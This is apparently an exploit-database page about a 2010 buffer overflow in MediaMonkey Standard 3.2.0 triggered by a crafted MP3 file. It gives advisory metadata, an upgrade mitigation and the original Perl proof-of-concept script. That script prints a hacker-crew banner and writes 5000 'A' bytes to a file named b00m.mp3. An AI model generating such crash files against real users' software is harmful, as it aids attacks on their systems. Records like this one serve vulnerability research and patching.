header-logo
Suggest Exploit
vendor:
MediaMonkey Standard
by:
Red-D3v1L
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: MediaMonkey Standard
Affected Version From: 3.2.0
Affected Version To: 3.2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:ventis_media:mediamonkey:3.2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

MediaMonkey Standard Buffer Overflow

A buffer overflow vulnerability exists in MediaMonkey Standard 3.2.0, which could allow an attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to a lack of proper validation of user-supplied input when handling a specially crafted MP3 file. An attacker can exploit this vulnerability by convincing a user to open a malicious MP3 file, resulting in arbitrary code execution in the context of the application.

Mitigation:

Upgrade to the latest version of MediaMonkey Standard.
Source

Exploit-DB raw data:

# Download : http://download.cnet.com/MediaMonkey-Standard/3000-2141_4-10109807.html
# Author: Red-D3v1L
## sh0otz fly t0 : j0rd4n14n.r1z,H1s0k4,ThE-g0bl!N,T3rr0rist,zAx,dr@g,h311 c0d3 And All sEc-r1z CrEw#
# n00bz : Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ...
# Version: 3.2.0
# my Home : www.sec-r1z.com , sEc-r1z CrEw#
#!/usr/bin/perl
system ("color a");
print "./SEC-R1Z_ _   _  _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\n";
print " /  / _ _   \\ /  __ _\ /   _ _ /\\       \  <   |/_ _ _ _ /\n";
print " \\  \\ _ _\\__ /  /_ _ /  /  __   |  ()   / |  |    /   /\n";
print "  \\ \__ _ \\  /  /_ _ /  /  |__|  |      /  |  |   /   /\n";
print "  _ _ _ _ \\/       /  \/2_0_1_0  |       \\\ |  |  /   /_____ \n";
print " /_ _ _ _ / \_ _ _ /\ _ _ _ /  |__|\ __\ |__| /___\\/J0_ _____./str1k3z y0u!!\n";
###################################
my $r1z= "b00m.mp3";
my $boom="\x41" x 5000;
open(myfile,'>>b00m.mp3');
print myfile $boom;
print "[+] d0nE\n";